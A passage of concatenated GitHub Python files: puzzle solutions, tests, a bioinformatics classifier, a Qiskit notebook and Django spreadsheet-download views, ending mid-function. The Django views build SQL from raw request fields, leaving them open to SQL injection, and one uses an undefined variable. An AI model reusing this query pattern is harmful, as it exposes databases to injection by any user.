5,width = 15, text =\"STOP_M2\", command = STOP_M2)\n\nNut_FOR_M2.pack()\nNut_REV_M2.pack()\nNut_STOP_M2.pack()\n\nTK.mainloop()\n","repo_name":"ductandev/do_an2","sub_path":"buoi2/vidu/cauh2motorgui.py","file_name":"cauh2motorgui.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9199182545","text":"puzzle = open(\"puzzle_input.txt\", \"r\")\ndata = puzzle.readlines()\nsum = 0\n\nfor bag in data:\n for j in range(0, int(len(bag)/2)):\n\n for k in range(int(len(bag)/2), int(len(bag))):\n\n if (bag[j] == bag[k] and bag[j] != \"_\"):\n\n if (64 < ord(bag[j]) < 91):\n sum += ord(bag[j])-38\n\n else:\n sum += ord(bag[j])-96\n\n bag = bag.replace(str(bag[j]), \"_\")\n\nprint(sum)\n","repo_name":"esrasrgl/AoC","sub_path":"y22/day3_1.py","file_name":"day3_1.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29291758256","text":"# -*- coding: utf-8 -*-\n\n\nfrom dp_tornado.engine.helper import Helper as dpHelper\n\ntry:\n import urllib.parse as _parse\nexcept:\n import urllib as _parse\n\ntry:\n import urlparse\nexcept ImportError:\n import urllib.parse as urlparse\n\n\nclass UrlParse(object):\n def __init__(self, request=None, scheme='', netloc='', path='', params=None, query=None, framgment=''):\n if request and 'X-Proxy-Prefix' in request.headers:\n if path.startswith(request.headers['X-Proxy-Prefix']):\n path = path[(len(request.headers['X-Proxy-Prefix']) - 1):]\n\n self.request = request\n self.scheme = scheme\n self.netloc = netloc\n self.path = path\n self.params = params or {}\n self.query = query or {}\n self.fragment = framgment\n\n def __str__(self):\n return ('scheme=%s, netloc=%s, path=%s, params=%s, query=%s, fragment=%s'\n % (self.scheme, self.netloc, self.path, self.params, self.query, self.fragment))\n\n\nclass UrlHelper(dpHelper):\n @property\n def urlparse(self):\n return urlparse\n\n def quote(self, s):\n if self.helper.system.py_version <= 2:\n return _parse.quote_plus(s)\n else:\n return _parse.quote_plus(s)\n\n def build(self, url, params):\n if self.helper.system.py_version <= 2:\n return '%s%s%s' % (url, '?' if params else '', _parse.urlencode(params))\n else:\n return '%s%s%s' % (url, '?' 
if params else '', _parse.urlencode(params))\n\n def urlencode(self, string):\n import requests.utils\n\n return requests.utils.quote(string)\n\n def parse(self, request):\n if self.helper.string.is_str(request):\n uri = self.helper.string.to_str(request)\n request = None\n else:\n uri = request.uri\n request = request\n\n if self.helper.system.py_version <= 2:\n p = urlparse.urlparse(uri)\n query = dict(urlparse.parse_qsl(p.query, keep_blank_values=True))\n else:\n p = _parse.urlparse(uri)\n query = dict(_parse.parse_qsl(p.query, keep_blank_values=True))\n\n return UrlParse(request, p.scheme, p.netloc, p.path, p.params, query, p.fragment)\n","repo_name":"leadermin/dp-tornado","sub_path":"dp_tornado/helper/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"29672941933","text":"from unittest import TestCase\nfrom blog import Blog\n\nclass BlogTest(TestCase):\n def test_create_posts(self):\n b = Blog('Test Title', 'Test Author')\n b.create_post('Test Post Title', 'Test Post Content')\n expected = 'Title: Test Title by Author: Test Author (1 post)'\n\n self.assertEqual(expected,b.__repr__())\n self.assertEqual(b.posts[0].title, 'Test Post Title')\n self.assertEqual(b.posts[0].content, 'Test Post Content')\n\n def test_json_no_posts(self):\n b = Blog('Test Title', 'Test Author')\n expected = {\n 'title': 'Test Title',\n 'author': 'Test Author',\n 'posts': []}\n\n self.assertDictEqual(expected,b.json())\n\n def test_json(self):\n b = Blog('Test Title', 'Test Author')\n b.create_post('Test Post Title', 'Test Post Content')\n\n expected = {\n 'title': 'Test Title',\n 'author': 'Test Author',\n 'posts': [{\n 'title': 'Test Post Title',\n 'content': 'Test Post Content'\n }]\n }\n\n self.assertDictEqual(expected, b.json())\n\n\n","repo_name":"katieqa/blog2","sub_path":"tests/integration/blog_test.py","file_name":"blog_test.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31882263141","text":"import csv\nimport numpy as np\nfrom collections import Counter\nfrom imblearn.under_sampling import RandomUnderSampler\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport sys\n\nsubsys= sys.argv[1]\nif subsys== 'cpgb':\n subsys_mets_file= './ecoli/ecoli_CPGB_mets.csv'\n subsys_genes_file= './ecoli/ecoli_CPGB_genes.csv'\nif subsys== 'acm':\n subsys_mets_file='./ecoli/ecoli_ACM_mets.csv'\n subsys_genes_file= './ecoli/ecoli_ACM_genes.csv'\n\n\ndef make_float(a):\n temp= []\n for i in a:\n temp_row= []\n for j in i:\n if j == '':\n temp_row.append(np.nan)\n else:\n temp_row.append(float(j))\n temp.append(temp_row)\n return np.array(temp)\n\n\ndef read_file(file_name):\n data= []\n with open(file_name, 'r') as file:\n reader= csv.reader(file, delimiter= ',')\n for row in reader:\n data.append(row)\n data= np.array(data)\n names= data[:, 0].reshape(-1,1)\n features= data[:, 1:].astype('str')\n\n return names, make_float(features)\n\n\ndef make_unique_without_zeros(features, decimal_points):\n unique_features_set= []\n for j in range(features.shape[1]):\n feature_set= []\n for i in range(features.shape[0]):\n feature_set.append(round(features[i][j], decimal_points))\n if all(x == 0 for x in feature_set):\n continue\n if feature_set not in unique_features_set:\n 
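# record this rounded column only on its first occurrence\n            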
unique_features_set.append(feature_set)\n return np.array(unique_features_set).transpose()\n\n\ndef read_stitch_interaction_file(file_name, met_names, gene_names, confidence_score):\n interactions= dict()\n with open(file_name, 'r') as file:\n reader= csv.reader(file, delimiter= \"\\t\")\n next(reader, None)\n for row in reader:\n met= row[0]\n if \"CIDm\" in met:\n met= met.replace(\"CIDm\", \"\")\n elif \"CIDs\" in met:\n met= met.replace(\"CIDs\", \"\")\n met= str(int(met))\n gene= row[1].split(\".\")[1]\n if met in met_names and gene in gene_names:\n if int(row[2]) >= confidence_score:\n interaction= 1\n else:\n interaction= 0\n interactions[(met, gene)]= interaction\n return interactions\n\n\ndef delete_redundant_entries(names, features):\n unique_names= []\n for name in names:\n if name[0] not in unique_names:\n unique_names.append(name[0])\n new_names=[]\n new_features= []\n for name in unique_names:\n temp= []\n for index, entry in enumerate(names.reshape(-1)):\n if name == entry:\n temp.append(features[index])\n summation= temp[0]\n count= len(temp)\n for x in temp[1:]:\n summation+=x\n temp= summation/count\n\n new_names.append(name)\n new_features.append(temp)\n return np.array(new_names).reshape(-1, 1), np.array(new_features)\n\n\n\ndef read_specified_file(filename, target, decimal_point):\n names, features= read_file(filename)\n features= make_unique_without_zeros(features, decimal_point)\n names, features= delete_redundant_entries(names, features)\n\n new_names= []\n new_features= []\n for entry in target:\n for index, name in enumerate(names):\n if entry == name[0]:\n new_names.append(entry)\n new_features.append(features[index])\n return np.array(new_names).reshape(-1, 1), np.array(new_features)\n\n\ndef make_dataset(met_names, met_features, gene_names, gene_features, gold_standard, confidence_score):\n\n met_names= met_names.transpose()[0].tolist()\n gene_names= gene_names.transpose()[0].tolist()\n\n interactions= dict()\n\n\n interactions= read_stitch_interaction_file('./511145.protein_chemical.links.v5.0.tsv',\n met_names, gene_names, confidence_score)\n\n\n dataset= np.zeros(( met_features.shape[1]+ gene_features.shape[1]+ 1))\n for i, m in enumerate(met_names):\n temp = []\n for j, p in enumerate(gene_names):\n if (m, p) in interactions:\n interaction= interactions[(m, p)]\n else:\n interaction= 0\n l= met_features[i].tolist()\n l.extend(gene_features[j])\n l.append(interaction)\n\n temp.append(l)\n dataset= np.vstack((dataset, np.array(temp)))\n\n dataset= np.delete(dataset, 0, axis= 0)\n print(\"Dataset shape:\\t\", dataset.shape)\n\n X= dataset[:, :-1]\n y= dataset[:, -1]\n\n print(\"X shape:\\t\", X.shape, \"\\ny shape:\\t\", y.shape)\n return X, y\n\ndef make_dataset_exception(met_names, met_features, gene_names, gene_features, gold_standard, confidence_score, exceptions):\n\n met_names= met_names.transpose()[0].tolist()\n gene_names= gene_names.transpose()[0].tolist()\n\n interactions= dict()\n\n interactions= read_stitch_interaction_file('./511145.protein_chemical.links.v5.0.tsv', met_names, gene_names, confidence_score)\n\n\n dataset= np.zeros(( met_features.shape[1]+ gene_features.shape[1]+ 1))\n for i, m in enumerate(met_names):\n temp = []\n for j, p in enumerate(gene_names):\n if (m, p) not in exceptions:\n if (m, p) in interactions:\n interaction= interactions[(m, p)]\n else:\n interaction= 0\n l= met_features[i].tolist()\n l.extend(gene_features[j])\n l.append(interaction)\n\n temp.append(l)\n dataset= np.vstack((dataset, np.array(temp)))\n\n dataset= 
np.delete(dataset, 0, axis= 0)\n print(\"Dataset shape:\\t\", dataset.shape)\n\n X= dataset[:, :-1]\n y= dataset[:, -1]\n\n print(\"X shape:\\t\", X.shape, \"\\ny shape:\\t\", y.shape)\n return X, y\n\n\ndef make_dataset_exact(met_names, met_features, gene_names, gene_features, gold_standard, confidence_score, exacts):\n\n met_names= met_names.transpose()[0].tolist()\n gene_names= gene_names.transpose()[0].tolist()\n\n interactions= dict()\n\n interactions= read_stitch_interaction_file('./511145.protein_chemical.links.v5.0.tsv', met_names, gene_names, confidence_score)\n\n\n dataset= np.zeros(( met_features.shape[1]+ gene_features.shape[1]+ 1))\n for i, m in enumerate(met_names):\n temp = []\n flag= False\n for j, p in enumerate(gene_names):\n if (m, p) in exacts:\n flag= True\n if (m, p) in interactions:\n interaction= interactions[(m, p)]\n else:\n interaction= 0\n l= met_features[i].tolist()\n l.extend(gene_features[j])\n l.append(interaction)\n\n temp.append(l)\n if flag:\n dataset= np.vstack((dataset, np.array(temp)))\n\n dataset= np.delete(dataset, 0, axis= 0)\n print(\"Dataset shape:\\t\", dataset.shape)\n\n X= dataset[:, :-1]\n y= dataset[:, -1]\n\n print(\"X shape:\\t\", X.shape, \"\\ny shape:\\t\", y.shape)\n return X, y\n\n\n\n\n\necoli_subsystem_mets= []\nwith open(subsys_mets_file, 'r') as file:\n reader= csv.reader(file, delimiter= ',')\n for row in reader:\n ecoli_subsystem_mets.append(row[0])\n\necoli_subsystem_genes= []\nwith open(subsys_genes_file, 'r') as file:\n reader= csv.reader(file, delimiter= ',')\n for row in reader:\n ecoli_subsystem_genes.append(row[0])\n\n\necoli_exceptions= [(m, p) for m in ecoli_subsystem_mets for p in ecoli_subsystem_genes]\n\n\necoli_met_filename= './ecoli/met_sps_t80_replaced.csv'\necoli_gene_filename= './ecoli/gene_in_rxns.csv'\necoli_all_met_names, ecoli_all_met_features = read_file(ecoli_met_filename)\necoli_all_met_features= make_unique_without_zeros(ecoli_all_met_features, 2)\necoli_all_met_names, ecoli_all_met_features= delete_redundant_entries(ecoli_all_met_names, ecoli_all_met_features)\necoli_all_gene_names, ecoli_all_gene_features =read_file(ecoli_gene_filename)\necoli_all_gene_features= make_unique_without_zeros(ecoli_all_gene_features, 0)\n\necoli_subsystem_met_names, ecoli_subsystem_met_features= read_specified_file(ecoli_met_filename, ecoli_subsystem_mets, 2)\necoli_subsystem_gene_names, ecoli_susbystem_gene_features= read_specified_file(ecoli_gene_filename, ecoli_subsystem_genes, 0)\n\nprint(\"Ecoli Test:\")\n\necoli_X_test, ecoli_y_test= make_dataset_exact(ecoli_subsystem_met_names, ecoli_subsystem_met_features,\n ecoli_subsystem_gene_names, ecoli_susbystem_gene_features,\n 'stitch_ecoli', 400, ecoli_exceptions)\n\nprint(\"Ecoli_train:\")\necoli_X_train, ecoli_y_train= make_dataset_exception(ecoli_all_met_names, ecoli_all_met_features,\n ecoli_all_gene_names, ecoli_all_gene_features,\n 'stitch_ecoli', 400, ecoli_exceptions)\n\n\nrus= RandomUnderSampler()\necoli_X_res, ecoli_y_res= rus.fit_resample(ecoli_X_train, ecoli_y_train)\nprint('Original Set:', Counter(ecoli_y_train))\nprint('Resampled Set:', Counter(ecoli_y_res))\nclf= RandomForestClassifier(n_estimators= 100)\nclf.fit(ecoli_X_res, ecoli_y_res)\necoli_y_pred= clf.predict(ecoli_X_test)\nprint(\"Ecoli accuracy on sussystem as a test set:\", accuracy_score(ecoli_y_test, 
ecoli_y_pred))\n","repo_name":"fayazsoleymani/SARTRE","sub_path":"subsys_shared/subsys.py","file_name":"subsys.py","file_ext":"py","file_size_in_byte":9496,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"17129291702","text":"#coding=utf-8\nclass Solution:\n def reverse(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n print(-int(2**31))\n #if x >= 2e31 or x < -2e31 or x == 0:\n # 注意,2e31和2**31的区别\n if x >= 2**31 or x <= -2**31 or x == 0:\n return 0\n str_x = str(x)\n # [i:j:s]的意思是,从i到j,步长为s\n # 如果s<0,则i,j都为负数,从倒数开始算\n # 例如s[-1:-len(s)-1:-1]就代表反转\n if x < 0:\n result = int('-'+str(int(str_x[-1:-len(str_x):-1])))\n # 千万别忘了,反转的记过也要判断啊!!!!!!\n if result >= 2 ** 31 or result <= -2 ** 31 or result == 0:\n return 0\n return result\n else:\n result = int(str(int(str_x[-1:-len(str_x)-1:-1])))\n if result >= 2 ** 31 or result <= -2 ** 31 or result == 0:\n return 0\n return result\n\nsolution = Solution()\nprint(solution.reverse(4236469))","repo_name":"PotentialPie/leetcode-python","sub_path":"algorithm/leetcode-7.py","file_name":"leetcode-7.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14991637410","text":"# 1 task\ndef check_str(text_source: str) -> str:\n index_upper = 0\n index_lower = 0\n\n for i in text_source:\n # checking lower\n if i.lower() == i and i.upper() != i:\n index_lower += 1\n # checking upper\n if i.lower() != i and i.upper() == i:\n index_upper += 1\n final_string = str(index_upper) + ' upper case, ' + str(index_lower) + ' lower case'\n return final_string\n\n# test 1\n# source = 'The quick Brown Fox'\n# print(check_str(source))\n\n\n\n# 2 task\ndef is_prime(int_source: int) -> bool:\n index = 0\n\n # calculations\n for i in range(int_source):\n if i != 0:\n if int_source % i == 0:\n index += 1\n if int_source % int_source == 0:\n index += 1\n\n # result\n if index == 2:\n result = True\n else:\n result = False\n return result\n\n# test 2\n# source = 777\n# print(is_prime(source))\n\n\n# 3 task\ndef get_ranges(list_source: list) -> str:\n path = []\n index = 0\n\n # calculations\n for i in range(len(list_source)):\n if i != len(list_source)-1 and list_source[i+1]-list_source[i] == 1:\n index += 1\n\n elif index == 0:\n path.append(str(list_source[i]))\n\n elif index != 0:\n path.append(f'{list_source[i - index]}-{list_source[i]}')\n index = 0\n\n result = f'{\",\".join(path)}'\n return result\n\n#test 3\n# source = [0, 1, 2, 3, 4, 7, 8, 10]\n# print(get_ranges(source))","repo_name":"MikitaTsiarentsyeu/Md-PT1-59-22","sub_path":"Tasks/Kirutsin/task5/task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72024633746","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nfrom qiskit import *\n\n\n# In[3]:\n\n\ncircuit = QuantumCircuit(2,2)\n\n\n# In[4]:\n\n\ncircuit.draw()\n\n\n# In[5]:\n\n\ncircuit.h(0)\n\n\n# In[6]:\n\n\ncircuit.draw()\n\n\n# In[7]:\n\n\ncircuit.cx(0, 1)\ncircuit.draw()\n\n\n# In[8]:\n\n\ncircuit.measure([0, 1], [0, 1]) #mesure qubit 0 and 1, and associate to classical bits 0 and 1\n\n\n# In[9]:\n\n\ncircuit.draw()\n\n\n# In[10]:\n\n\nsimulator = Aer.get_backend(\"qasm_simulator\")\n\n\n# In[12]:\n\n\nexecute(circuit, backend=simulator).result()\n\n\n# In[13]:\n\n\nfrom qiskit.visualization import plot_histogram\n\n\n# In[14]:\n\n\nresult = 
execute(circuit, backend=simulator).result()\n\n\n# In[15]:\n\n\nplot_histogram(result.get_counts(circuit))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"RicardoParizotto/qiskit_learn","sub_path":"hello-quantum/ibm_example.py","file_name":"ibm_example.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35737584527","text":"import tensorflow as tf\nimport numpy as np\n\n\ndef get_syn_data(num_data=2000):\n sample = np.random.uniform(low=0.25, high=1, size=num_data)\n x = sample * np.cos(4 * np.pi * sample)\n y = sample * np.sin(4 * np.pi * sample)\n\n return np.vstack((x, y)).T\n\n\ndef get_data(dataset_name, data_shape, buffer_size, batch_size):\n if dataset_name == 'mnist':\n (train_images, train_labels), (_, _) = tf.keras.datasets.mnist.load_data()\n elif dataset_name == 'cifar10':\n (train_images, train_labels), (_, _) = tf.keras.datasets.cifar10.load_data()\n elif dataset_name == 'cifar100':\n (train_images, train_labels), (_, _) = tf.keras.datasets.cifar100.load_data()\n elif dataset_name == 'fashion_mnist':\n (train_images, train_labels), (_, _) = tf.keras.datasets.fashion_mnist.load_data()\n elif dataset_name == 'Synthetic2d':\n train_images = get_syn_data()\n else:\n raise ValueError('No datasets supported')\n\n train_images = train_images.reshape(train_images.shape[0], *data_shape).astype('float32')\n if dataset_name != 'Synthetic2d':\n train_images = (train_images - 127.5) / 127.5\n\n BUFFER_SIZE = buffer_size\n BATCH_SIZE = batch_size\n\n # Batch and shuffle the data\n train_dataset = tf.data.Dataset.from_tensor_slices(train_images).shuffle(BUFFER_SIZE).batch(BATCH_SIZE)\n\n if dataset_name != 'Synthetic2d':\n ind = np.arange(0, train_images.shape[0])\n ind = np.random.choice(ind, size=10000, replace=False)\n test_data = train_images[ind, :]\n test_data = test_data.reshape(10000, -1)\n else:\n test_data = get_syn_data(10000)\n test_data = test_data.astype('float32')\n test_data = test_data.reshape(10000, -1)\n\n\n return train_dataset, test_data\n\n# print(get_syn_data(10))\n","repo_name":"yihang-gao/WGAN_generalization","sub_path":"LWGAN_code/utils/loaddata.py","file_name":"loaddata.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5671107665","text":"#\n# @lc app=leetcode id=1930 lang=python\n#\n# [1930] Unique Length-3 Palindromic Subsequences\n#\n\n# @lc code=start\nfrom collections import Counter, defaultdict\nclass Solution(object):\n def countPalindromicSubsequence(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n res = set()\n left = set()\n right = Counter(s)\n\n for i in range(len(s)):\n right[s[i]] -= 1\n if right[s[i]] == 0:\n right.pop(s[i])\n \n for c in \"abcdefghijklmnopqrstuvwxyz\":\n if c in left and c in right:\n res.add((s[i], c))\n left.add(s[i])\n \n return len(res)\n# @lc code=end\ns = \"tlpjzdmtwderpkpmgoyrcxttiheassztncqvnfjeyxxp\"\nprint(Solution().countPalindromicSubsequence(s))","repo_name":"felivalencia3/Leetcode","sub_path":"1930.unique-length-3-palindromic-subsequences.py","file_name":"1930.unique-length-3-palindromic-subsequences.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6401706141","text":"import os\nimport datetime\nimport pandas as pd\nfrom copy import copy\nfrom pytz import timezone\nfrom my_modules import mysqlconn\n\nfrom 
django.shortcuts import render\nfrom django.http import HttpResponse, StreamingHttpResponse\nfrom django.template import loader\nfrom django.urls import reverse\n\nfrom . import models\nfrom .config import templates as templates_cnf\n\n\n#################################################\n# global variable part\n\n# get fields from models\ndef _get_fields():\n fields = []\n for i in models.Orders._meta.fields:\n fields.append('orders.' + str(i).split('.')[-1])\n fields.remove('orders.id')\n for i in models.OrderItems._meta.fields:\n fields.append('orderitems.' + str(i).split('.')[-1])\n fields.remove('orderitems.id')\n for i in models.Inventory._meta.fields:\n fields.append('inventory.' + str(i).split('.')[-1])\n fields.remove('inventory.id')\n return fields\n\n\nfields = _get_fields()\ncontext = {'fields': fields,\n 'selected_field': '',\n 'conditions': '',\n}\n\n\n#################################################\n# custom exception part\nclass QueryException(Exception):\n \"\"\"It raise an exception when it comes an error using the selected_field and conditions to query\"\"\"\n pass\n\n\nclass CreateSheetError(Exception):\n \"\"\"It raise an exception when it comes an error using the data and fields to create a sheet\"\"\"\n\n def __init__(self, expression=None, message=None):\n self.expression = expression\n self.message = message\n\n def __str__(self):\n if self.expression:\n return self.expression, self.message\n else:\n return self.message\n\n\n#################################################\n# view part\ndef index(request):\n template = loader.get_template('sheet_download/index.html')\n return HttpResponse(template.render({}, request))\n\n\ndef templates(request):\n template = loader.get_template('sheet_download/templates.html')\n return HttpResponse(template.render(context, request))\n\n\ndef orders(request):\n template = loader.get_template('sheet_download/orders.html')\n return HttpResponse(template.render(context, request))\n\n\ndef download(request):\n conditions = {}\n from_tz = request.POST['from_tz']\n to_tz = request.POST['to_tz']\n conditions['purchase_start'] = _form_date_str(request.POST.getlist('purchase_start'))\n conditions['purchase_end'] = _form_date_str(request.POST.getlist('purchase_end'))\n conditions['paid_start'] = _form_date_str(request.POST.getlist('paid_start'))\n conditions['paid_end'] = _form_date_str(request.POST.getlist('paid_end'))\n fields = request.POST.getlist('fields')\n _context = copy(context)\n\n selected_field = \", \".join(fields)\n _conditions = []\n if conditions['purchase_start'] != \"0000-00-00 00:00:00\":\n conditions['purchase_start'] = tz_transfer(conditions['purchase_start'], from_tz, to_tz)\n _conditions.append(\"orders.PurchaseDate>='%s'\" % conditions['purchase_start'])\n if conditions['purchase_end'] != \"0000-00-00 00:00:00\":\n conditions['purchase_end'] = tz_transfer(conditions['purchase_end'], from_tz, to_tz)\n _conditions.append(\"orders.PurchaseDate<'%s'\" % conditions['purchase_end'])\n if conditions['paid_start'] != \"0000-00-00 00:00:00\":\n conditions['paid_start'] = tz_transfer(conditions['paid_start'], from_tz, to_tz)\n _conditions.append(\"orders.PaidDate>='%s'\" % conditions['paid_start'])\n if conditions['paid_end'] != \"0000-00-00 00:00:00\":\n conditions['paid_end'] = tz_transfer(conditions['paid_end'], from_tz, to_tz)\n _conditions.append(\"orders.PaidDate<'%s'\" % conditions['paid_end'])\n _conditions = \" and \".join(_conditions)\n\n try:\n assert selected_field\n data = _query(selected_field, _conditions)\n 
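# _create_sheet is called with ('UTC', from_tz): DB timestamps (assumed UTC) are converted to the user's selected timezone\n        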
file_path = _create_sheet(data, selected_field, 'UTC', from_tz)\n except AssertionError:\n _context['error_message'] = \"Must Select Some Fields\"\n except QueryException:\n _context['error_message'] = \"QueryError: The Date is wrong\"\n except CreateSheetError:\n _context['error_message'] = \"CreateSheetError: Please try again after a moment\"\n\n if _context.get('error_message'):\n return render(request,\n 'sheet_download/orders.html',\n context=_context\n )\n else:\n response = StreamingHttpResponse(_file_iterator(file_path))\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(file_path[-20:])\n return response\n\n\ndef custom_download(request):\n conditions = request.POST['conditions'].strip()\n selected_field = request.POST['selected_field'].strip()\n _context = copy(context)\n _context['selected_field'] = selected_field\n _context['conditions'] = conditions\n\n try:\n assert selected_field\n data = _query(selected_field, conditions)\n file_path = _create_sheet(data, selected_field, 'UTC', from_tz)\n except AssertionError:\n _context['error_message_custom'] = \"Select Fields can't be None\"\n except QueryException:\n _context['error_message_custom'] = \"QueryError: Select Fields or Conditions is wrong\"\n except CreateSheetError:\n _context['error_message_custom'] = \"CreateSheetError: Please try again after a moment\"\n\n if _context.get('error_message'):\n return render(request,\n 'sheet_download/orders.html',\n context=_context\n )\n else:\n response = StreamingHttpResponse(_file_iterator(file_path))\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(file_path[-20:])\n return response\n\n\ndef templates_download(request):\n conditions = {}\n from_tz = request.POST['from_tz']\n to_tz = request.POST['to_tz']\n template_id = request.POST['template_id']\n conditions['purchase_start'] = _form_date_str(request.POST.getlist('purchase_start'))\n conditions['purchase_end'] = _form_date_str(request.POST.getlist('purchase_end'))\n conditions['paid_start'] = _form_date_str(request.POST.getlist('paid_start'))\n conditions['paid_end'] = _form_date_str(request.POST.getlist('paid_end'))\n _context = copy(context)\n\n selected_field = [i[0] for i in templates_cnf[template_id]['selected_field']]\n column_name = [i[1] for i in templates_cnf[template_id]['selected_field']]\n selected_field = ','.join(selected_field)\n _conditions = []\n if conditions['purchase_start'] != \"0000-00-00 00:00:00\":\n conditions['purchase_start'] = tz_transfer(conditions['purchase_start'], from_tz, to_tz)\n _conditions.append(\"orders.PurchaseDate>='%s'\" % conditions['purchase_start'])\n if conditions['purchase_end'] != \"0000-00-00 00:00:00\":\n conditions['purchase_end'] = tz_transfer(conditions['purchase_end'], from_tz, to_tz)\n _conditions.append(\"orders.PurchaseDate<'%s'\" % conditions['purchase_end'])\n if conditions['paid_start'] != \"0000-00-00 00:00:00\":\n conditions['paid_start'] = tz_transfer(conditions['paid_start'], from_tz, to_tz)\n _conditions.append(\"orders.PaidDate>='%s'\" % conditions['paid_start'])\n if conditions['paid_end'] != \"0000-00-00 00:00:00\":\n conditions['paid_end'] = tz_transfer(conditions['paid_end'], from_tz, to_tz)\n _conditions.append(\"orders.PaidDate<'%s'\" % conditions['paid_end'])\n _conditions = \" and \".join(_conditions)\n\n try:\n assert selected_field\n data = _query(selected_field, _conditions)\n file_path = 
_create_sheet(data, selected_field, 'UTC', from_tz, col_repl=column_name)\n    except AssertionError:\n        _context['error_message'] = \"Must Select Some Fields\"\n    except QueryException:\n        _context['error_message'] = \"QueryError\"\n    except CreateSheetError:\n        _context['error_message'] = \"CreateSheetError: Please try again after a moment\"\n\n    if _context.get('error_message'):\n        return render(request,\n                      'sheet_download/templates.html',\n                      context=_context\n                      )\n    else:\n        response = StreamingHttpResponse(_file_iterator(file_path))\n        response['Content-Type'] = 'application/octet-stream'\n        response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(file_path[-20:])\n        return response\n\n\ndef inventory_download(request):\n    conditions = {}\n    from_tz = request.POST['from_tz']\n    to_tz = request.POST['to_tz']\n    template_id = request.POST['template_id']\n    marketplace_id = request.POST['marketplace']\n    _context = copy(context)\n\n    selected_field = [i[0] for i in templates_cnf[template_id]['selected_field']]\n    column_name = [i[1] for i in templates_cnf[template_id]['selected_field']]\n    selected_field = ','.join(selected_field)\n    sql = \"select %s from inventory left join price on inventory.SellerSKU=price.SellerSKU and inventory.Seller=price.Seller and inventory.MarketplaceId=price.MarketplaceId where inventory.MarketplaceId='%s';\" % (selected_field, marketplace_id)\n\n    try:\n        data = _query(selected_field, conditions, sql=sql)\n        file_path = _create_sheet(data, selected_field, 'UTC', from_tz, col_repl=column_name)\n    except Exception:\n        _context['error_message_2'] = \"CreateSheetError: Please try again after a moment\"\n\n    if _context.get('error_message_2'):\n        return render(request,\n                      'sheet_download/templates.html',\n                      context=_context\n                      )\n    else:\n        response = StreamingHttpResponse(_file_iterator(file_path))\n        response['Content-Type'] = 'application/octet-stream'\n        response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(file_path[-20:])\n        return response\n\n\n#################################################\n# auxiliary function part\n\n# form datetime string for PurchaseDate and PaidDate\n# the PurchaseDate or PaidDate got from the web request is a list like ['', '00:00:00'] or ['2018-01-01', '00:00:00']\ndef _form_date_str(datetime_list):\n    if datetime_list[0]:\n        return ' '.join(datetime_list)\n    else:\n        return ' '.join(['0000-00-00', datetime_list[1]])\n\n# query in orders, orderitems and inventory tables according to the selected_field and conditions\ndef _query(selected_field, conditions, sql=None):\n    if not sql:\n        sql = \"select \" + selected_field + \" from orders \" \\\n              \"left join orderitems on orders.AmazonOrderId=orderitems.AmazonOrderId \" \\\n              \"left join inventory on orderitems.SellerSKU=inventory.SellerSKU \" \\\n              \"and orders.Seller=inventory.Seller\"\n    if conditions:\n        sql = sql + \" where \" + conditions\n    # order the data by orders.LastUpdateDate to ease the later handling\n    sql = sql + \" order by orders.AmazonOrderId, orders.LastUpdateDate;\"\n\n    conn = None\n    try:\n        conn = mysqlconn.mysqlconn(db='DB_NAME')\n        cur = conn.cursor()\n        cur.execute(sql)\n        data = cur.fetchall()\n    except Exception:\n        raise QueryException\n    else:\n        result = []\n        # delete the duplicate data\n        for i in data:\n            if i not in result:\n                result.append(i)\n        return result\n    finally:\n        # close the connection only if it was actually opened\n        if conn is not None:\n            conn.close()\n\n\n# create a sheet according to data and fields\ndef _create_sheet(data, fields, from_tz, to_tz, col_repl=None):\n    # col_repl=None avoids a mutable default argument; a falsy value means \"no renaming\"\n    if isinstance(fields, str):\n        fields = fields.replace(' ', '').split(',')\n    elif isinstance(fields, list) or 
